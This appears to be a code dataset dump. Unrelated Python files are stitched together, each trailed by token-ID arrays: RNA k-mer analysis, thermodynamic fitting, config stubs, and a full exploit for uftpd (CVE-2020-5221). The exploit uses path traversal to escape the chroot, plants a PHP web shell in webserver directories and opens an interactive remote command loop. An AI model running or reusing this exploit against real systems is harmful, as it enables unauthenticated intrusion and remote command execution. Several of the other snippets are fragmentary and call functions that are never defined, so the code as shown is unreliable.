fake_freqs = list(fake_freqs.values())
one_mer_pc = np.asarray(pc_freqs[ONE_MER_MIN:ONE_MER_MAX])
one_mer_nc = np.asarray(nc_freqs[ONE_MER_MIN:ONE_MER_MAX])
one_mer_fake = np.asarray(fake_freqs[ONE_MER_MIN:ONE_MER_MAX])
two_mer_pc = np.asarray(pc_freqs[TWO_MER_MIN:TWO_MER_MAX])
two_mer_nc = np.asarray(nc_freqs[TWO_MER_MIN:TWO_MER_MAX])
two_mer_fake = np.asarray(fake_freqs[TWO_MER_MIN:TWO_MER_MAX])
three_mer_pc = np.asarray(pc_freqs[THREE_MER_MIN:THREE_MER_MAX])
three_mer_nc = np.asarray(nc_freqs[THREE_MER_MIN:THREE_MER_MAX])
three_mer_fake = np.asarray(fake_freqs[THREE_MER_MIN:THREE_MER_MAX])
#Garbage collection
pc_freqs = None
nc_freqs = None
fake_freqs = None
# Generate max ORF lengths
# In[12]:
oc = ORF_counter()
pc_max_orf_len = np.empty(1, dtype=object)
nc_max_orf_len = np.empty(1, dtype=object)
fake_max_orf_len = np.empty(1, dtype=object)
pc_max_orf_len[0] = np.zeros(len(pc_sequences))
nc_max_orf_len[0] = np.zeros(len(nc_sequences))
fake_max_orf_len[0] = np.zeros(len(fake_sequences))
for i in range(len(pc_sequences)):
oc.set_sequence(pc_sequences[i])
pc_max_orf_len[0][i] = oc.get_max_orf_len()
for i in range(len(nc_sequences)):
oc.set_sequence(nc_sequences[i])
nc_max_orf_len[0][i] = oc.get_max_orf_len()
for i in range(len(fake_sequences)):
oc.set_sequence(fake_sequences[i])
fake_max_orf_len[0][i] = oc.get_max_orf_len()
# Get sequence lengths and sequence length vs. max ORF length correlation coefficients
# In[13]:
pc_seq_len = np.asarray(list(map(lambda x : len(x), pc_sequences)))
pc_seq_len_orf_len_corrcoef = np.corrcoef(pc_seq_len, pc_max_orf_len[0])
nc_seq_len = np.asarray(list(map(lambda x : len(x), nc_sequences)))
nc_seq_len_orf_len_corrcoef = np.corrcoef(nc_seq_len, nc_max_orf_len[0])
fake_seq_len = np.asarray(list(map(lambda x : len(x), fake_sequences)))
fake_seq_len_orf_len_corrcoef = np.corrcoef(fake_seq_len, fake_max_orf_len[0])
# ## Results
# In[14]:
data_set_names = ['mRNA', 'lncRNA']
pg = PlotGenerator()
pg.set_text_options(90, 'center', 0, 'center', 12)
pg.set_text('Mean 1-Mer Frequencies', 'Mer', 'Mean Frequency', one_mer_keys, None)
pg.bar_plot([one_mer_pc, one_mer_nc], data_set_names)
pg.set_text_options(90, 'center', 0, 'center', 12)
pg.set_text('Mean 2-Mer Frequencies', 'Mer', 'Mean Frequency', two_mer_keys, None)
pg.bar_plot([two_mer_pc, two_mer_nc], data_set_names)
pg.set_figure_options(width=14)
pg.set_text_options(90, 'center', 0, 'center', 12)
pg.set_text('Mean 3-Mer Frequencies', 'Mer', 'Mean Frequency', three_mer_keys, None)
pg.bar_plot([three_mer_pc, three_mer_nc], data_set_names)
pg.set_figure_options()
pg.set_text_options(45, 'right', 0, 'center', 12)
pg.set_text('Max ORF Lengths', 'RNA Types', 'Max ORF Length', [''], None)
pg.box_plot([pc_max_orf_len, nc_max_orf_len], data_set_names, False)
pg.set_text('mRNA ORF Length vs Sequence Length', 'Sequence Length', 'ORF Length', None, None)
pg.scatter_plot(pc_seq_len, pc_max_orf_len[0], trendline=True)
print('mRNA Sequence Length ORF Length Correlation Coefficient:')
print('\t', pc_seq_len_orf_len_corrcoef)
pg.set_text('lncRNA ORF Length vs Sequence Length', 'Sequence Length', 'ORF Length', None, None)
pg.scatter_plot(nc_seq_len, nc_max_orf_len[0], trendline=True)
print('lnc Sequence Length ORF Length Correlation Coefficient:')
print('\t', nc_seq_len_orf_len_corrcoef)
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
2,
19617,
25,
3384,
69,
12,
23,
198,
198,
2,
1303,
16213,
9107,
198,
2,
220,
198,
2,
5133,
16772,
11,
22632,
11,
290,
832,
4572,
4673,
8996,
47227,
290,
300,
10782,
27204,
16311,
4... | 2.449851 | 4,377 |
#!/usr/bin/env python3
# Author: Aaron Esau (Arinerron) <security@aaronesau.com>
# Writeup: https://aaronesau.com/blog/posts/6
# Product: uftpd 2.6-2.10
# CVE ID: CVE-2020-5221
# This exploit uses a directory traversal vulnerability and escapes uftpd's
# crappy implementation of a chroot jail. It does not require authentication.
# It looks for common webserver paths on the FTP server and attempts to place a
# PHP backdoor to pop a shell with.
#################
# Configuration #
#################
# the IPv4 address of the remote host
RHOST = '127.0.0.1'
# an IPv4 address accessible from the remote host
LHOST = '127.0.0.1'
# the port that the FTP server is using on the remote host
RPORT = 21
# the filename (basename) of the file to upload
FILENAME = 'shell.php'
# the contents of the uploaded file
FILE_CONTENT = '<?php system($_REQUEST["cmd"]); ?>\n'
# make a GET request to see if the file is accessible afterward?
CHECK_FILE = True
# a list of webserver paths to check on the remote host, in order of priority
WEBSERVER_PATHS = [
'/var/www/html/',
'/srv/http/',
'/web/',
'/www',
'/srv/www-data/',
'/srv/www/',
'/var/www/',
'/srv/'
]
# whether or not to upload the file in each directory or only the first found
STOP_ON_FIRST = True
# if True, it will not check if a directory exists, just try to upload immediately
# Note: If enabled, it will ignore STOP_ON_FIRST
AGGRESSIVE_MODE = False
# if True, it will only upload if it detects "webserver-like" files in the directory
# Note: If enabled, it will ignore AGGRESSIVE_MODE
STRICT_WEBSERVER = True
# these are the extensions to use to identify "webserver-like" directories
WEBSERVER_EXTENSIONS = [
'.php',
'.aspx',
'.asp',
'.cgi',
'.html',
'.htm',
'.js',
'.css',
'.scss'
]
# this makes logging get messy, useful if the script is broken
DEBUG = False
####################
# Useful Libraries #
####################
# cheers, no external libraries!
import sys, socket, urllib.request, urllib.parse, re, time
# try to configure things if the person was too lazy to open this PoC
if len(sys.argv) >= 2:
RHOST = sys.argv[1]
if len(sys.argv) >= 3:
RPORT = sys.argv[2]
# they were probably too lazy to configure this too :(
LHOST = socket.gethostbyname(socket.gethostname())
# nice logging things
vlog = lambda msg : log(msg, char = ' ', color = '\033[0m')
dlog = lambda msg : log(msg)
ilog = lambda msg : log(msg, char = '+', color = '\033[92m')
wlog = lambda msg : log(msg, char = '!', color = '\033[33m')
elog = lambda msg : log(msg, char = '-', color = '\033[01m\033[31m')
# useful socket functions
# useful ftp things
# creates the format octet,octet,octet,octet,portnumb,portnumb for FTP PORT cmd
# removes duplicate slashes from filepaths
# send an FTP command, made for lazy devs
# send a command and get data response
# send a command and get data response
# returns a list of tuples (name, perms)
# uploads a file with contents `contents` to a file named `filename`
################
# Exploit Code #
################
if __name__ == '__main__':
# make a nice pretty banner thing
print()
ilog('''\033[01m\033[32muftpd Directory Traversal (Chroot Bypass)
\033[0m\033[32mAuthor: Aaron Esau (Arinerron)
Writeup: \033[04mhttps://aaronesau.com/blog/posts/6
''')
# try to connect to the server
ilog('Connecting to %s:%d...' % (RHOST, RPORT))
sock = tcp.client(RHOST, RPORT)
# banner check the server
banner = sock.read()
dlog('Banner: ' + banner)
if not 'uftpd' in banner:
elog('A uftpd server does not appear to be running at %s:%d' %(RHOST, RPORT))
banner_match = re.search('.*uftpd \((2\.(10|[6-9])).*\).*', banner)
if not banner_match:
wlog('The target uftpd server does not appear to be running the right version')
else:
ilog('The target appears to be running uftp version %s which is vulnerable' % banner_match.group(1))
# we'll add all the paths here we want to upload to
targets = set()
found = False
# try each path
for path in WEBSERVER_PATHS:
# "aggressive mode" tells it to not check if the directory exists first
if not (AGGRESSIVE_MODE and not STRICT_WEBSERVER):
files = LIST(sock, path)
if len(files) != 0:
found = True
dlog('Found a directory with %d files' % len(files))
# look for webserver-like file extensions
found_extensions = set()
for filename, perms in files:
for extension in WEBSERVER_EXTENSIONS:
if filename.endswith(extension):
found_extensions.add(extension)
# if we found "webserver-like" extensions
if len(found_extensions) != 0:
extensions_list = ', '.join(found_extensions)
# we gotta keep good english here tho
if len(found_extensions) == 2:
extensions_list = ' and '.join(found_extensions)
elif len(found_extensions) > 2:
extensions_list = ', '.join(list(found_extensions)[:-1]) + ', and ' + list(found_extensions)[-1]
dlog('Found files with the extension' + ('s' if len(found_extensions) > 1 else '') + ' %s, so this path is probably a webserver' % extensions_list)
# ok well we found what we wanted, let's keep it
if not (STRICT_WEBSERVER and len(found_extensions) == 0):
targets.add(path)
# warn about overwriting files
for filename, perms in files:
if FILENAME == filename:
wlog('Will overwrite existing file %s' % strip_slashes(path + FILENAME))
break
else:
# aggressive mode, we want it!
targets.add(path)
# stop if told to
if (found and STOP_ON_FIRST):
vlog('STOP_ON_FIRST is enabled and a path was found, stopping...')
break
# tell the user if we didn't find anything
if len(targets) == 0:
wlog('Either the vulnerability is unexploitable or we were unable to find a writable path')
else:
# now upload to each path we found
for path in targets:
basename = FILENAME
filename = strip_slashes(path + '/' + basename)
dlog('Uploading %s to %s ...' % (basename, filename))
if not STOR(sock, filename, FILE_CONTENT):
wlog('Failed to upload file to %s' % filename)
else:
ilog('File uploaded to %s' % filename)
# check the webserver to see if the file is accessible
if CHECK_FILE:
url = 'http://%s/%s' % (RHOST, FILENAME)
found = False
try:
urllib.request.urlopen(url, timeout = 5).read().decode('utf-8', errors = 'ignore')
found = True
ilog('Hooray, your file was found at %s ...have fun!' % url)
except:
wlog('The file %s could not be found on the webserver, you will have to manually look for it' % FILENAME)
# if the user is super lazy and didn't even bother to configure, let's just pop a nice shell
if found and (FILENAME == 'shell.php' and FILE_CONTENT.strip() == '<?php system($_REQUEST["cmd"]); ?>'):
try:
while True:
cmd = urllib.parse.urlencode({'cmd' : input('$ ')})
print(urllib.request.urlopen(url + '?' + cmd, timeout = 5).read().decode('utf-8', errors = 'ignore')[:-1])
except (KeyboardInterrupt, EOFError) as e:
pass
dlog('Script finished, goodbye!')
exit()
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
628,
198,
2,
6434,
25,
12139,
8678,
559,
357,
3163,
7274,
1313,
8,
1279,
12961,
31,
64,
283,
1952,
559,
13,
785,
29,
198,
2,
19430,
929,
25,
3740,
1378,
64,
283,
1952,
559,
13,
78... | 2.372689 | 3,354 |
"""
Name: ExSTraCS_Online_Environement.py
Authors: Ryan Urbanowicz - Written at Dartmouth College, Hanover, NH, USA
Contact: ryan.j.urbanowicz@darmouth.edu
Created: April 25, 2014
Modified: August 25,2014
Description: ExSTraCS is best suited to offline iterative learning, however this module has been implemented as an example of how ExSTraCS may be used
to perform online learning as well. Here, this module has been written to perform online learning for a n-multiplexer problem, where training
instances are generated in an online fashion. This module has not been fully tested.
---------------------------------------------------------------------------------------------------------------------------------------------------------
ExSTraCS V2.0: Extended Supervised Tracking and Classifying System - An advanced LCS designed specifically for complex, noisy classification/data mining tasks,
such as biomedical/bioinformatics/epidemiological problem domains. This algorithm should be well suited to any supervised learning problem involving
classification, prediction, data mining, and knowledge discovery. This algorithm would NOT be suited to function approximation, behavioral modeling,
or other multi-step problems. This LCS algorithm is most closely based on the "UCS" algorithm, an LCS introduced by Ester Bernado-Mansilla and
Josep Garrell-Guiu (2003) which in turn is based heavily on "XCS", an LCS introduced by Stewart Wilson (1995).
Copyright (C) 2014 Ryan Urbanowicz
This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the
Free Software Foundation; either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABLILITY
or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation,
Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
---------------------------------------------------------------------------------------------------------------------------------------------------------
"""
#Import Required Modules-------------------------------
from exstracs.exstracs_data import DataManagement
from exstracs.exstracs_constants import *
from exstracs.Online_Learning.problem_multiplexer import * #http://stackoverflow.com/questions/4383571/importing-files-from-different-folder-in-python
import sys
#------------------------------------------------------ | [
37811,
198,
5376,
25,
220,
220,
220,
220,
220,
220,
220,
1475,
2257,
430,
7902,
62,
14439,
62,
4834,
2268,
972,
13,
9078,
198,
30515,
669,
25,
220,
220,
220,
220,
6047,
14665,
47982,
532,
22503,
379,
47888,
5535,
11,
9530,
2502,
11,... | 4.255385 | 650 |
"""
cP_EOS.py
SPDX-License-Identifier: BSD-2-Clause
Copyright (c) 2021 Stuart Nolan. All rights reserved.
"""
import pdb
import CoolProp.CoolProp as cP
from CoolProp import AbstractState as cPAS
from tabulate import tabulate
from scipy.optimize import minimize
"""
from CoolProp/include/DataStructures.h
0 iphase_liquid, < Subcritical liquid
1 iphase_supercritical, < Supercritical (p > pc, T > Tc)
2 iphase_supercritical_gas, < Supercritical gas (p < pc, T > Tc)
3 iphase_supercritical_liquid, < Supercritical liquid (p > pc, T < Tc)
4 iphase_critical_point, < At the critical point
5 iphase_gas, < Subcritical gas
6 iphase_twophase, < Twophase
7 iphase_unknown, < Unknown phase
8 iphase_not_imposed
import CoolProp
CoolProp.iphase_twophase
Out: 6
"""
cPFluids = dict([(fluid, cP.get_fluid_param_string(fluid,"CAS")) for fluid in
cP.get_global_param_string("fluids_list").split(',')])
# H2, N2, CO ternary data, Table VI, pA-4 (p78), Eubanks, 1957
# REF: https://scholarship.rice.edu/bitstream/handle/1911/18254/3079688.PDF?sequence=1&isAllowed=y
c1="Hydrogen"
c2="Nitrogen"
rawdata_header=["T /degF", "P /psia", "%s lMF" % c1 , "%s vMF" % c1]
rawdata = [
[-310,315,0.0487, 0.8655],
[-310,500,0.0763, 0.8948],
# [-310,1400,0.2488, 0.8622],
# [-310,2000,0.3446, 0.7977],
[-280,315,0.0377, 0.5509],
[-280,500,0.0741, 0.6686],
[-280,800,0.1384, 0.7205],
[-280,1100,0.2092, 0.7070],
[-280,1400,0.3221, 0.6462],
]
data_header=["T /K", "P /bar", "%s lMF" % c1 , "%s vMF" % c1]
data = []
psia2bar = lambda P : P/14.503774
degF2K = lambda T : 5/9*(T - 32) + 273.15
for row in rawdata:
data.append([degF2K(row[0]),psia2bar(row[1]),row[2],row[3]])
#print(tabulate(data,headers=data_header)+'\n')
EOS="PR"
cPAS_cEOS = cPAS(EOS, c1+"&"+c2)
res = minimize(cEOS_fit_kij, 0.1, bounds=[(-0.2,0.5)], args=(data, cPAS_cEOS))
kij=res.x[0]
#kij=0.0864 # EOS="PR"
#kij=0.0641 # EOS="SRK"
cPAS_cEOS.set_binary_interaction_double(0,1,"kij",kij)
(DPpP,Dy,outData) = deltaVar(data,cPAS_cEOS)
outData_header=["T_exp /K", "c1 lMF_exp", "P_exp /bar", "P_%s /bar" % EOS,
"c1 vMF_exp", "c1 vMF_%s" % EOS]
print("\nc1: %s;" % c1)
print("c2: %s;" % c2)
print("kij: %.4f; DPpP_%s: %.2f; Dy_%s: %.2f;\n" % (kij, EOS, DPpP, EOS, Dy))
print(tabulate(outData,headers=outData_header)+'\n')
CAS_c1=cPFluids[c1]
CAS_c2=cPFluids[c2]
# [c2-c1 betaT gammaT betaV gammaV], Table A8, ref 31, Kunz & Wagner 2012
# REF: https://github.com/CoolProp/CoolProp/blob/master/dev/mixtures/KunzWagner2012_TableA8.txt
#cP.set_mixture_binary_pair_data(CAS_c1,CAS_c2,'betaT',0.972532065)
#cP.set_mixture_binary_pair_data(CAS_c1,CAS_c2,'betaV',0.946134337)
EOS = "HEOS"
cPAS_HEOS = cP.AbstractState(EOS,c1+"&"+c2)
"""
(DPpP,Dy,outData) = deltaVar(data,cPAS_HEOS)
# pdb.pm() from ipython...
outData_header=["T_exp /K", "c1 lMF_exp", "P_exp /bar", "P_%s /bar" % EOS,
"c1 vMF_exp", "c1 vMF_%s" % EOS]
print("\nc1: %s;" % c1)
print("c2: %s;" % c2)
print("DPpP_%s: %.2f; Dy_%s: %.2f;\n" % (EOS, DPpP, EOS, Dy))
print(tabulate(outData,headers=outData_header)+'\n')
"""
| [
37811,
198,
66,
47,
62,
36,
2640,
13,
9078,
198,
198,
4303,
36227,
12,
34156,
12,
33234,
7483,
25,
347,
10305,
12,
17,
12,
2601,
682,
198,
15269,
357,
66,
8,
33448,
22559,
27788,
13,
1439,
2489,
10395,
13,
198,
37811,
198,
11748,
... | 2.00581 | 1,549 |
# Copyright 2020 Open Climate Tech Contributors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
Aanlyze ML model for weather data at different thresholds
"""
import os, sys
from firecam.lib import settings
from firecam.lib import weather
from firecam.lib import collect_args
from firecam.lib import goog_helper
from firecam.lib import tf_helper
import logging
import numpy as np
if __name__ == "__main__":
main()
| [
2,
15069,
12131,
4946,
13963,
9634,
25767,
669,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
2,
345,
743,
407,
779,
428,
2393,
2845,
287,
11846,
351,
262,
13789,
13,
198,
... | 3.899225 | 258 |
import os
import subprocess
####################################################################################################
# Additional PYTHONPATH to allow notebooks to import custom modules at a few pre-defined places.
_cwd = os.getcwd()
_line = 'sys.path.append("{}")'
_pythonpath = [
"import sys, os",
_line.format(os.getcwd()),
]
# Add GIT_ROOT/ and a few other subdirs
try:
_p = subprocess.run(["git", "rev-parse", "--show-toplevel"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
if _p.returncode == 0:
_git_root = _p.stdout[:-1].decode("utf-8") # Remove trailing '\n'
_pythonpath += [
_line.format(_git_root), # GIT_ROOT
_line.format(os.path.join(_git_root, "src")), # GIT_ROOT/src
_line.format(os.path.join(_git_root, "notebooks")), # GIT_ROOT/notebooks
]
except: # noqa: E722
pass
c.InteractiveShellApp.exec_lines = _pythonpath # type: ignore # noqa: F821
####################################################################################################
| [
11748,
28686,
198,
11748,
850,
14681,
198,
198,
29113,
29113,
29113,
4242,
198,
2,
15891,
350,
56,
4221,
1340,
34219,
284,
1249,
43935,
284,
1330,
2183,
13103,
379,
257,
1178,
662,
12,
23211,
4113,
13,
198,
198,
62,
66,
16993,
796,
28... | 2.701266 | 395 |
import asyncio
import logging
import sys
logging.basicConfig(format="{message}",
style='{',
datefmt="%H:%M:%S",
level=logging.DEBUG)
if __name__ == "__main__":
asyncio.run(main(*sys.argv[1:]))
| [
11748,
30351,
952,
198,
11748,
18931,
198,
11748,
25064,
628,
198,
6404,
2667,
13,
35487,
16934,
7,
18982,
2625,
90,
20500,
92,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220... | 1.871429 | 140 |